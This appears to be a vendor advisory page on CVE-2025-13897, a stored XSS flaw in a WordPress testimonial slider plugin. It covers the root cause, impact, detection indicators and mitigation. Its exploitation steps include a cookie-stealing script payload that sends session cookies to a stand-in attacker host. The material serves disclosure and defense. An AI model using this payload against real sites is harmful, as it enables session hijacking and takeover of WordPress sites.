CVE-2025-13897: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-13897 is a Stored Cross-Site Scripting (XSS) vulnerability in the Client Testimonial Slider plugin for WordPress, affecting all versions up to and including 2.0. The flaw exists in the aft_testimonial_meta_name custom field within the Client Information metabox, where insufficient input sanitization and output escaping allow authenticated attackers with Contributor-level access or above to inject arbitrary web scripts. The vulnerability was disclosed on January 9, 2026, and was reported by Wordfence. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically a stored XSS variant. The vulnerable code is located at line 117 of wp-client-testimonial.php, where user-supplied input from the aft_testimonial_meta_name field in the Client Information metabox is stored without proper sanitization and later rendered without output escaping. An attacker with at least Contributor-level WordPress access can submit a malicious payload through this field, which is then persistently stored and executed in the browser of any user who visits the affected administrative page (Wordfence, Plugin Source).

Impact

Successful exploitation allows an authenticated attacker to persistently inject and execute arbitrary JavaScript in the context of administrative pages, affecting any user — including administrators — who accesses those pages. This can lead to session hijacking, credential theft, unauthorized administrative actions (such as creating rogue admin accounts or installing malicious plugins), and potential full site compromise. The changed scope (S:C) in the CVSS vector indicates the impact extends beyond the plugin itself to the broader WordPress environment (Wordfence).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-13897. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence).

Exploitation steps

  1. Gain Contributor Access: Obtain or register a WordPress account with at least Contributor-level privileges on the target site running Client Testimonial Slider ≤ 2.0.
  2. Navigate to Testimonial Editor: Log in to the WordPress admin dashboard and navigate to the Client Testimonial Slider post/entry creation or editing interface.
  3. Inject Malicious Payload: In the Client Information metabox, enter a crafted XSS payload into the aft_testimonial_meta_name field, such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Save the Entry: Submit or update the testimonial entry, causing the malicious script to be stored in the WordPress database without sanitization.
  5. Trigger Execution: When an administrator or other privileged user visits the affected administrative page that renders the testimonial data, the injected script executes in their browser, enabling session hijacking, credential theft, or further administrative actions (Wordfence, Plugin Source).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to admin-post or post-edit endpoints for testimonial entries from low-privileged user accounts; unexpected admin-level actions (plugin installs, user creation) in WordPress audit logs shortly after a contributor-level login.
  • Database: Entries in the wp_postmeta table for the aft_testimonial_meta_name meta key containing <script>, javascript:, onerror=, or other HTML event handler patterns.
  • Network: Outbound requests from administrator browsers to unknown external domains following visits to the testimonial admin page, potentially indicating cookie or credential exfiltration.
  • File System: Unexpected new PHP files or modifications to theme/plugin files that could indicate follow-on compromise after admin session hijacking.

Mitigation and workarounds

As of the disclosure date (January 9, 2026), no patched version of the Client Testimonial Slider plugin beyond version 2.0 was confirmed available. Site administrators should immediately deactivate and remove the plugin until a patched version is released. As a workaround, restrict Contributor-level user registrations and audit existing contributor accounts for suspicious activity. Monitor the official WordPress plugin repository for an updated version that implements proper input sanitization (e.g., sanitize_text_field()) and output escaping (e.g., esc_html() or esc_attr()) on the affected field (Wordfence, Plugin Source).

Community reactions

Wordfence disclosed and reported this vulnerability as part of their weekly WordPress vulnerability report for January 5–11, 2026, covering it alongside numerous other WordPress plugin issues (Wordfence Blog). No significant independent researcher commentary or broader media coverage has been identified for this specific CVE, consistent with its medium severity and limited attack surface.

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management